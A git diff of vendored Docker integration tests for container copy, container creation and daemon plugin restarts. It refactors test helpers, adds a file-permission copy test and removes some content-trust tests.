c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -388,7 +284,7 @@ func (s *DockerSuite) TestCpToCaseF(c *check.C) { srcDir := cpPath(tmpDir, "dir1") dstFile := containerCpPath(containerID, "/root/file1") - err := runDockerCp(c, srcDir, dstFile) + err := runDockerCp(c, srcDir, dstFile, nil) c.Assert(err, checker.NotNil) c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) @@ -415,7 +311,7 @@ func (s *DockerSuite) TestCpToCaseG(c *check.C) { // Ensure that dstPath doesn't exist. c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -433,7 +329,7 @@ func (s *DockerSuite) TestCpToCaseG(c *check.C) { // Ensure that dstPath doesn't exist. c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -456,7 +352,7 @@ func (s *DockerSuite) TestCpToCaseH(c *check.C) { srcDir := cpPathTrailingSep(tmpDir, "dir1") + "." dstDir := containerCpPath(containerID, "testDir") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. 
c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -470,7 +366,7 @@ func (s *DockerSuite) TestCpToCaseH(c *check.C) { dstDir = containerCpPathTrailingSep(containerID, "testDir") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -493,7 +389,7 @@ func (s *DockerSuite) TestCpToCaseI(c *check.C) { srcDir := cpPathTrailingSep(tmpDir, "dir1") + "." dstFile := containerCpPath(containerID, "/root/file1") - err := runDockerCp(c, srcDir, dstFile) + err := runDockerCp(c, srcDir, dstFile, nil) c.Assert(err, checker.NotNil) c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) @@ -521,7 +417,7 @@ func (s *DockerSuite) TestCpToCaseJ(c *check.C) { // Ensure that dstPath doesn't exist. c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -538,7 +434,7 @@ func (s *DockerSuite) TestCpToCaseJ(c *check.C) { // Ensure that dstPath doesn't exist. c.Assert(containerStartOutputEquals(c, containerID, ""), checker.IsNil) - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) // Should now contain file1-1's contents. 
c.Assert(containerStartOutputEquals(c, containerID, "file1-1\n"), checker.IsNil) @@ -562,7 +458,7 @@ func (s *DockerSuite) TestCpToErrReadOnlyRootfs(c *check.C) { srcPath := cpPath(tmpDir, "file1") dstPath := containerCpPath(containerID, "/root/shouldNotExist") - err := runDockerCp(c, srcPath, dstPath) + err := runDockerCp(c, srcPath, dstPath, nil) c.Assert(err, checker.NotNil) c.Assert(isCpCannotCopyReadOnly(err), checker.True, check.Commentf("expected ErrContainerRootfsReadonly error, but got %T: %s", err, err)) @@ -589,7 +485,7 @@ func (s *DockerSuite) TestCpToErrReadOnlyVolume(c *check.C) { srcPath := cpPath(tmpDir, "file1") dstPath := containerCpPath(containerID, "/vol_ro/shouldNotExist") - err := runDockerCp(c, srcPath, dstPath) + err := runDockerCp(c, srcPath, dstPath, nil) c.Assert(err, checker.NotNil) c.Assert(isCpCannotCopyReadOnly(err), checker.True, check.Commentf("expected ErrVolumeReadonly error, but got %T: %s", err, err)) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go index 45d85ba5d1..8f830dcf9d 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_unix_test.go @@ -6,12 +6,37 @@ import ( "fmt" "os" "path/filepath" + "strconv" + "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/pkg/system" "github.com/go-check/check" ) +func (s *DockerSuite) TestCpToContainerWithPermissions(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + tmpDir := getTestDir(c, "test-cp-to-host-with-permissions") + defer os.RemoveAll(tmpDir) + + makeTestContentInDir(c, tmpDir) + + containerName := "permtest" + + _, exc := dockerCmd(c, "create", "--name", containerName, "debian:jessie", "/bin/bash", "-c", 
"stat -c '%u %g %a' /permdirtest /permdirtest/permtest") + c.Assert(exc, checker.Equals, 0) + defer dockerCmd(c, "rm", "-f", containerName) + + srcPath := cpPath(tmpDir, "permdirtest") + dstPath := containerCpPath(containerName, "/") + c.Assert(runDockerCp(c, srcPath, dstPath, []string{"-a"}), checker.IsNil) + + out, err := startContainerGetOutput(c, containerName) + c.Assert(err, checker.IsNil, check.Commentf("output: %v", out)) + c.Assert(strings.TrimSpace(out), checker.Equals, "2 2 700\n65534 65534 400", check.Commentf("output: %v", out)) +} + // Check ownership is root, both in non-userns and userns enabled modes func (s *DockerSuite) TestCpCheckDestOwnership(c *check.C) { testRequires(c, DaemonIsLinux, SameHostDaemon) @@ -27,7 +52,7 @@ func (s *DockerSuite) TestCpCheckDestOwnership(c *check.C) { srcPath := cpPath(tmpDir, "file1") dstPath := containerCpPath(containerID, "/tmpvol", "file1") - err := runDockerCp(c, srcPath, dstPath) + err := runDockerCp(c, srcPath, dstPath, nil) c.Assert(err, checker.IsNil) stat, err := system.Stat(filepath.Join(tmpVolDir, "file1")) @@ -37,3 +62,20 @@ func (s *DockerSuite) TestCpCheckDestOwnership(c *check.C) { c.Assert(stat.UID(), checker.Equals, uint32(uid), check.Commentf("Copied file not owned by container root UID")) c.Assert(stat.GID(), checker.Equals, uint32(gid), check.Commentf("Copied file not owned by container root GID")) } + +func getRootUIDGID() (int, int, error) { + uidgid := strings.Split(filepath.Base(testEnv.DaemonInfo.DockerRootDir), ".") + if len(uidgid) == 1 { + //user namespace remapping is not turned on; return 0 + return 0, 0, nil + } + uid, err := strconv.Atoi(uidgid[0]) + if err != nil { + return 0, 0, err + } + gid, err := strconv.Atoi(uidgid[1]) + if err != nil { + return 0, 0, err + } + return uid, gid, nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils_test.go similarity index 76% rename from 
vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go rename to vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils_test.go index 0501c5d735..79a016f0c6 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_utils_test.go @@ -7,10 +7,11 @@ import ( "os" "os/exec" "path/filepath" + "runtime" "strings" + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/integration/checker" "github.com/go-check/check" ) @@ -26,6 +27,9 @@ type fileData struct { filetype fileType path string contents string + uid int + gid int + mode int } func (fd fileData) creationCommand() string { @@ -55,31 +59,33 @@ func mkFilesCommand(fds []fileData) string { } var defaultFileData = []fileData{ - {ftRegular, "file1", "file1"}, - {ftRegular, "file2", "file2"}, - {ftRegular, "file3", "file3"}, - {ftRegular, "file4", "file4"}, - {ftRegular, "file5", "file5"}, - {ftRegular, "file6", "file6"}, - {ftRegular, "file7", "file7"}, - {ftDir, "dir1", ""}, - {ftRegular, "dir1/file1-1", "file1-1"}, - {ftRegular, "dir1/file1-2", "file1-2"}, - {ftDir, "dir2", ""}, - {ftRegular, "dir2/file2-1", "file2-1"}, - {ftRegular, "dir2/file2-2", "file2-2"}, - {ftDir, "dir3", ""}, - {ftRegular, "dir3/file3-1", "file3-1"}, - {ftRegular, "dir3/file3-2", "file3-2"}, - {ftDir, "dir4", ""}, - {ftRegular, "dir4/file3-1", "file4-1"}, - {ftRegular, "dir4/file3-2", "file4-2"}, - {ftDir, "dir5", ""}, - {ftSymlink, "symlinkToFile1", "file1"}, - {ftSymlink, "symlinkToDir1", "dir1"}, - {ftSymlink, "brokenSymlinkToFileX", "fileX"}, - {ftSymlink, "brokenSymlinkToDirX", "dirX"}, - {ftSymlink, "symlinkToAbsDir", "/root"}, + {ftRegular, "file1", "file1", 0, 0, 0666}, + {ftRegular, "file2", "file2", 0, 0, 0666}, + {ftRegular, "file3", "file3", 0, 0, 0666}, + {ftRegular, "file4", "file4", 0, 0, 0666}, + {ftRegular, "file5", "file5", 0, 0, 0666}, 
+ {ftRegular, "file6", "file6", 0, 0, 0666}, + {ftRegular, "file7", "file7", 0, 0, 0666}, + {ftDir, "dir1", "", 0, 0, 0777}, + {ftRegular, "dir1/file1-1", "file1-1", 0, 0, 0666}, + {ftRegular, "dir1/file1-2", "file1-2", 0, 0, 0666}, + {ftDir, "dir2", "", 0, 0, 0666}, + {ftRegular, "dir2/file2-1", "file2-1", 0, 0, 0666}, + {ftRegular, "dir2/file2-2", "file2-2", 0, 0, 0666}, + {ftDir, "dir3", "", 0, 0, 0666}, + {ftRegular, "dir3/file3-1", "file3-1", 0, 0, 0666}, + {ftRegular, "dir3/file3-2", "file3-2", 0, 0, 0666}, + {ftDir, "dir4", "", 0, 0, 0666}, + {ftRegular, "dir4/file3-1", "file4-1", 0, 0, 0666}, + {ftRegular, "dir4/file3-2", "file4-2", 0, 0, 0666}, + {ftDir, "dir5", "", 0, 0, 0666}, + {ftSymlink, "symlinkToFile1", "file1", 0, 0, 0666}, + {ftSymlink, "symlinkToDir1", "dir1", 0, 0, 0666}, + {ftSymlink, "brokenSymlinkToFileX", "fileX", 0, 0, 0666}, + {ftSymlink, "brokenSymlinkToDirX", "dirX", 0, 0, 0666}, + {ftSymlink, "symlinkToAbsDir", "/root", 0, 0, 0666}, + {ftDir, "permdirtest", "", 2, 2, 0700}, + {ftRegular, "permdirtest/permtest", "perm_test", 65534, 65534, 0400}, } func defaultMkContentCommand() string { @@ -91,12 +97,16 @@ func makeTestContentInDir(c *check.C, dir string) { path := filepath.Join(dir, filepath.FromSlash(fd.path)) switch fd.filetype { case ftRegular: - c.Assert(ioutil.WriteFile(path, []byte(fd.contents+"\n"), os.FileMode(0666)), checker.IsNil) + c.Assert(ioutil.WriteFile(path, []byte(fd.contents+"\n"), os.FileMode(fd.mode)), checker.IsNil) case ftDir: - c.Assert(os.Mkdir(path, os.FileMode(0777)), checker.IsNil) + c.Assert(os.Mkdir(path, os.FileMode(fd.mode)), checker.IsNil) case ftSymlink: c.Assert(os.Symlink(fd.contents, path), checker.IsNil) } + + if fd.filetype != ftSymlink && runtime.GOOS != "windows" { + c.Assert(os.Chown(path, fd.uid, fd.gid), checker.IsNil) + } } } @@ -178,10 +188,14 @@ func containerCpPathTrailingSep(containerID string, pathElements ...string) stri return fmt.Sprintf("%s/", containerCpPath(containerID, 
pathElements...)) } -func runDockerCp(c *check.C, src, dst string) (err error) { - c.Logf("running `docker cp %s %s`", src, dst) +func runDockerCp(c *check.C, src, dst string, params []string) (err error) { + c.Logf("running `docker cp %s %s %s`", strings.Join(params, " "), src, dst) + + args := []string{"cp"} - args := []string{"cp", src, dst} + args = append(args, params...) + + args = append(args, src, dst) out, _, err := runCommandWithOutput(exec.Command(dockerBinary, args...)) if err != nil { @@ -214,18 +228,10 @@ func getTestDir(c *check.C, label string) (tmpDir string) { return } -func isCpNotExist(err error) bool { - return strings.Contains(err.Error(), "no such file or directory") || strings.Contains(err.Error(), "cannot find the file specified") -} - func isCpDirNotExist(err error) bool { return strings.Contains(err.Error(), archive.ErrDirNotExists.Error()) } -func isCpNotDir(err error) bool { - return strings.Contains(err.Error(), archive.ErrNotDirectory.Error()) || strings.Contains(err.Error(), "filename, directory name, or volume label syntax is incorrect") -} - func isCpCannotCopyDir(err error) bool { return strings.Contains(err.Error(), archive.ErrCannotCopyDir.Error()) } @@ -234,10 +240,6 @@ func isCpCannotCopyReadOnly(err error) bool { return strings.Contains(err.Error(), "marked read-only") } -func isCannotOverwriteNonDirWithDir(err error) bool { - return strings.Contains(err.Error(), "cannot overwrite non-directory") -} - func fileContentEquals(c *check.C, filename, contents string) (err error) { c.Logf("checking that file %q contains %q\n", filename, contents) @@ -289,7 +291,7 @@ func containerStartOutputEquals(c *check.C, containerID, contents string) (err e } func defaultVolumes(tmpDir string) []string { - if SameHostDaemon.Condition() { + if SameHostDaemon() { return []string{ "/vol1", fmt.Sprintf("%s:/vol2", tmpDir), diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go index 515a340976..9ec400b2e1 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_create_test.go @@ -8,11 +8,10 @@ import ( "strings" "time" - "os/exec" - - "io/ioutil" - - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/internal/test/fakecontext" "github.com/docker/docker/pkg/stringid" "github.com/docker/go-connections/nat" "github.com/go-check/check" @@ -27,13 +26,13 @@ func (s *DockerSuite) TestCreateArgs(c *check.C) { out, _ = dockerCmd(c, "inspect", cleanedContainerID) - containers := []struct { + var containers []struct { ID string Created time.Time Path string Args []string Image string - }{} + } err := json.Unmarshal([]byte(out), &containers) c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) @@ -59,7 +58,7 @@ func (s *DockerSuite) TestCreateArgs(c *check.C) { // Make sure we can grow the container's rootfs at creation time. 
func (s *DockerSuite) TestCreateGrowRootfs(c *check.C) { // Windows and Devicemapper support growing the rootfs - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { testRequires(c, Devicemapper) } out, _ := dockerCmd(c, "create", "--storage-opt", "size=120G", "busybox") @@ -88,11 +87,11 @@ func (s *DockerSuite) TestCreateHostConfig(c *check.C) { out, _ = dockerCmd(c, "inspect", cleanedContainerID) - containers := []struct { + var containers []struct { HostConfig *struct { PublishAllPorts bool } - }{} + } err := json.Unmarshal([]byte(out), &containers) c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) @@ -110,11 +109,11 @@ func (s *DockerSuite) TestCreateWithPortRange(c *check.C) { out, _ = dockerCmd(c, "inspect", cleanedContainerID) - containers := []struct { + var containers []struct { HostConfig *struct { PortBindings map[nat.Port][]nat.PortBinding } - }{} + } err := json.Unmarshal([]byte(out), &containers) c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) c.Assert(containers, checker.HasLen, 1) @@ -139,11 +138,11 @@ func (s *DockerSuite) TestCreateWithLargePortRange(c *check.C) { out, _ = dockerCmd(c, "inspect", cleanedContainerID) - containers := []struct { + var containers []struct { HostConfig *struct { PortBindings map[nat.Port][]nat.PortBinding } - }{} + } err := json.Unmarshal([]byte(out), &containers) c.Assert(err, check.IsNil, check.Commentf("Error inspecting the container: %s", err)) @@ -196,7 +195,7 @@ func (s *DockerSuite) TestCreateLabels(c *check.C) { dockerCmd(c, "create", "--name", name, "-l", "k1=v1", "--label", "k2=v2", "busybox") actual := make(map[string]string) - inspectFieldAndMarshall(c, name, "Config.Labels", &actual) + inspectFieldAndUnmarshall(c, name, "Config.Labels", &actual) if !reflect.DeepEqual(expected, actual) { c.Fatalf("Expected %s got %s", expected, actual) @@ -205,19 +204,15 @@ func (s *DockerSuite) TestCreateLabels(c *check.C) { func (s 
*DockerSuite) TestCreateLabelFromImage(c *check.C) { imageName := "testcreatebuildlabel" - _, err := buildImage(imageName, - `FROM busybox - LABEL k1=v1 k2=v2`, - true) - - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox + LABEL k1=v1 k2=v2`)) name := "test_create_labels_from_image" expected := map[string]string{"k2": "x", "k3": "v3", "k1": "v1"} dockerCmd(c, "create", "--name", name, "-l", "k2=x", "--label", "k3=v3", imageName) actual := make(map[string]string) - inspectFieldAndMarshall(c, name, "Config.Labels", &actual) + inspectFieldAndUnmarshall(c, name, "Config.Labels", &actual) if !reflect.DeepEqual(expected, actual) { c.Fatalf("Expected %s got %s", expected, actual) @@ -227,8 +222,8 @@ func (s *DockerSuite) TestCreateLabelFromImage(c *check.C) { func (s *DockerSuite) TestCreateHostnameWithNumber(c *check.C) { image := "busybox" // Busybox on Windows does not implement hostname command - if daemonPlatform == "windows" { - image = WindowsBaseImage + if testEnv.OSType == "windows" { + image = testEnv.PlatformDefaults.BaseImage } out, _ := dockerCmd(c, "run", "-h", "web.0", image, "hostname") c.Assert(strings.TrimSpace(out), checker.Equals, "web.0", check.Commentf("hostname not set, expected `web.0`, got: %s", out)) @@ -264,18 +259,13 @@ func (s *DockerSuite) TestCreateModeIpcContainer(c *check.C) { func (s *DockerSuite) TestCreateByImageID(c *check.C) { imageName := "testcreatebyimageid" - imageID, err := buildImage(imageName, - `FROM busybox - MAINTAINER dockerio`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, imageName, build.WithDockerfile(`FROM busybox + MAINTAINER dockerio`)) + imageID := getIDByName(c, imageName) truncatedImageID := stringid.TruncateID(imageID) dockerCmd(c, "create", imageID) dockerCmd(c, "create", truncatedImageID) - dockerCmd(c, "create", fmt.Sprintf("%s:%s", imageName, truncatedImageID)) // Ensure this fails out, exit, _ := dockerCmdWithError("create", 
fmt.Sprintf("%s:%s", imageName, imageID)) @@ -283,11 +273,14 @@ func (s *DockerSuite) TestCreateByImageID(c *check.C) { c.Fatalf("expected non-zero exit code; received %d", exit) } - if expected := "Error parsing reference"; !strings.Contains(out, expected) { + if expected := "invalid reference format"; !strings.Contains(out, expected) { c.Fatalf(`Expected %q in output; got: %s`, expected, out) } - out, exit, _ = dockerCmdWithError("create", fmt.Sprintf("%s:%s", "wrongimage", truncatedImageID)) + if i := strings.IndexRune(imageID, ':'); i >= 0 { + imageID = imageID[i+1:] + } + out, exit, _ = dockerCmdWithError("create", fmt.Sprintf("%s:%s", "wrongimage", imageID)) if exit == 0 { c.Fatalf("expected non-zero exit code; received %d", exit) } @@ -297,138 +290,6 @@ func (s *DockerSuite) TestCreateByImageID(c *check.C) { } } -func (s *DockerTrustSuite) TestTrustedCreate(c *check.C) { - repoName := s.setupTrustedImage(c, "trusted-create") - - // Try create - createCmd := exec.Command(dockerBinary, "create", repoName) - s.trustedCmd(createCmd) - out, _, err := runCommandWithOutput(createCmd) - c.Assert(err, check.IsNil) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out)) - - dockerCmd(c, "rmi", repoName) - - // Try untrusted create to ensure we pushed the tag to the registry - createCmd = exec.Command(dockerBinary, "create", "--disable-content-trust=true", repoName) - s.trustedCmd(createCmd) - out, _, err = runCommandWithOutput(createCmd) - c.Assert(err, check.IsNil) - c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted create with --disable-content-trust:\n%s", out)) - -} - -func (s *DockerTrustSuite) TestUntrustedCreate(c *check.C) { - repoName := fmt.Sprintf("%v/dockercliuntrusted/createtest", privateRegistryURL) - withTagName := fmt.Sprintf("%s:latest", repoName) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", 
"busybox", withTagName) - dockerCmd(c, "push", withTagName) - dockerCmd(c, "rmi", withTagName) - - // Try trusted create on untrusted tag - createCmd := exec.Command(dockerBinary, "create", withTagName) - s.trustedCmd(createCmd) - out, _, err := runCommandWithOutput(createCmd) - c.Assert(err, check.Not(check.IsNil)) - c.Assert(string(out), checker.Contains, fmt.Sprintf("does not have trust data for %s", repoName), check.Commentf("Missing expected output on trusted create:\n%s", out)) - -} - -func (s *DockerTrustSuite) TestTrustedIsolatedCreate(c *check.C) { - repoName := s.setupTrustedImage(c, "trusted-isolated-create") - - // Try create - createCmd := exec.Command(dockerBinary, "--config", "/tmp/docker-isolated-create", "create", repoName) - s.trustedCmd(createCmd) - out, _, err := runCommandWithOutput(createCmd) - c.Assert(err, check.IsNil) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out)) - - dockerCmd(c, "rmi", repoName) -} - -func (s *DockerTrustSuite) TestCreateWhenCertExpired(c *check.C) { - c.Skip("Currently changes system time, causing instability") - repoName := s.setupTrustedImage(c, "trusted-create-expired") - - // Certificates have 10 years of expiration - elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11) - - runAtDifferentDate(elevenYearsFromNow, func() { - // Try create - createCmd := exec.Command(dockerBinary, "create", repoName) - s.trustedCmd(createCmd) - out, _, err := runCommandWithOutput(createCmd) - c.Assert(err, check.Not(check.IsNil)) - c.Assert(string(out), checker.Contains, "could not validate the path to a trusted root", check.Commentf("Missing expected output on trusted create in the distant future:\n%s", out)) - }) - - runAtDifferentDate(elevenYearsFromNow, func() { - // Try create - createCmd := exec.Command(dockerBinary, "create", "--disable-content-trust", repoName) - s.trustedCmd(createCmd) - out, _, err := runCommandWithOutput(createCmd) - 
c.Assert(err, check.Not(check.IsNil)) - c.Assert(string(out), checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted create in the distant future:\n%s", out)) - - }) -} - -func (s *DockerTrustSuite) TestTrustedCreateFromBadTrustServer(c *check.C) { - repoName := fmt.Sprintf("%v/dockerclievilcreate/trusted:latest", privateRegistryURL) - evilLocalConfigDir, err := ioutil.TempDir("", "evilcreate-local-config-dir") - c.Assert(err, check.IsNil) - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil) - c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out)) - - dockerCmd(c, "rmi", repoName) - - // Try create - createCmd := exec.Command(dockerBinary, "create", repoName) - s.trustedCmd(createCmd) - out, _, err = runCommandWithOutput(createCmd) - c.Assert(err, check.IsNil) - c.Assert(string(out), checker.Contains, "Tagging", check.Commentf("Missing expected output on trusted push:\n%s", out)) - - dockerCmd(c, "rmi", repoName) - - // Kill the notary server, start a new "evil" one. - s.not.Close() - s.not, err = newTestNotary(c) - c.Assert(err, check.IsNil) - - // In order to make an evil server, lets re-init a client (with a different trust dir) and push new data. 
- // tag an image and upload it to the private registry - dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName) - - // Push up to the new server - pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - c.Assert(err, check.IsNil) - c.Assert(string(out), checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out)) - - // Now, try creating with the original client from this new trust server. This should fail because the new root is invalid. - createCmd = exec.Command(dockerBinary, "create", repoName) - s.trustedCmd(createCmd) - out, _, err = runCommandWithOutput(createCmd) - if err == nil { - c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out) - } - if !strings.Contains(out, "could not rotate trust to a new trusted root") { - c.Fatalf("Missing expected output on trusted create:\n%s", out) - } - -} - func (s *DockerSuite) TestCreateStopSignal(c *check.C) { name := "test_create_stop_signal" dockerCmd(c, "create", "--name", name, "--stop-signal", "9", "busybox") @@ -446,7 +307,7 @@ func (s *DockerSuite) TestCreateWithWorkdir(c *check.C) { dockerCmd(c, "create", "--name", name, "-w", dir, "busybox") // Windows does not create the workdir until the container is started - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { dockerCmd(c, "start", name) } dockerCmd(c, "cp", fmt.Sprintf("%s:%s", name, dir), prefix+slash+"tmp") @@ -479,21 +340,21 @@ RUN chmod 755 /entrypoint.sh ENTRYPOINT ["/entrypoint.sh"] CMD echo foobar` - ctx, err := fakeContext(dockerfile, map[string]string{ - "entrypoint.sh": `#!/bin/sh + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "entrypoint.sh": `#!/bin/sh echo "I am an entrypoint" exec "$@"`, - }) - c.Assert(err, check.IsNil) + })) 
defer ctx.Close() - _, err = buildImageFromContext(name, ctx, true) - c.Assert(err, check.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) - out, _ := dockerCmd(c, "create", "--entrypoint=", name, "echo", "foo") + out := cli.DockerCmd(c, "create", "--entrypoint=", name, "echo", "foo").Combined() id := strings.TrimSpace(out) c.Assert(id, check.Not(check.Equals), "") - out, _ = dockerCmd(c, "start", "-a", id) + out = cli.DockerCmd(c, "start", "-a", id).Combined() c.Assert(strings.TrimSpace(out), check.Equals, "foo") } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go index f91edc6555..69e190c30d 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go @@ -3,24 +3,20 @@ package main import ( - "os" - "os/exec" - "path/filepath" "strings" - "syscall" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/docker/docker/pkg/mount" "github.com/go-check/check" + "golang.org/x/sys/unix" + "gotest.tools/icmd" ) // TestDaemonRestartWithPluginEnabled tests state restore for an enabled plugin func (s *DockerDaemonSuite) TestDaemonRestartWithPluginEnabled(c *check.C) { testRequires(c, IsAmd64, Network) - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c) if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { c.Fatalf("Could not install plugin: %v %s", err, out) @@ -35,9 +31,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPluginEnabled(c *check.C) { } }() - if err := s.d.Restart(); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c) out, err := s.d.Cmd("plugin", "ls") if err != nil { @@ -51,9 +45,7 @@ func (s *DockerDaemonSuite) 
TestDaemonRestartWithPluginEnabled(c *check.C) { func (s *DockerDaemonSuite) TestDaemonRestartWithPluginDisabled(c *check.C) { testRequires(c, IsAmd64, Network) - if err := s.d.Start(); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c) if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName, "--disable"); err != nil { c.Fatalf("Could not install plugin: %v %s", err, out) @@ -65,9 +57,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPluginDisabled(c *check.C) { } }() - if err := s.d.Restart(); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c) out, err := s.d.Cmd("plugin", "ls") if err != nil { @@ -82,16 +72,12 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPluginDisabled(c *check.C) { func (s *DockerDaemonSuite) TestDaemonKillLiveRestoreWithPlugins(c *check.C) { testRequires(c, IsAmd64, Network) - if err := s.d.Start("--live-restore"); err != nil { - c.Fatalf("Could not start daemon: %v", err) - } + s.d.Start(c, "--live-restore") if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil { c.Fatalf("Could not install plugin: %v %s", err, out) } defer func() { - if err := s.d.Restart("--live-restore"); err != nil { - c.Fatalf("Could not restart daemon: %v", err) - } + s.d.Restart(c, "--live-restore") if out, err := s.d.Cmd("plugin", "disable", pName); err != nil { c.Fatalf("Could not disable plugin: %v %s", err, out) } @@ -104,10 +90,7 @@ func (s *DockerDaemonSuite) TestDaemonKillLiveRestoreWithPlugins(c *check.C) { c.Fatalf("Could not kill daemon: %v", err) } - cmd := exec.Command("pgrep", "-f", pluginProcessName) - if out, ec, err := runCommandWithOutput(cmd); ec != 0 { - c.Fatalf("Expected exit code '0', got %d err: %v output: %s ", ec, err, out) - } + icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Success) } // TestDaemonShutdownLiveRestoreWithPlugins SIGTERMs daemon started with --live-restore. 
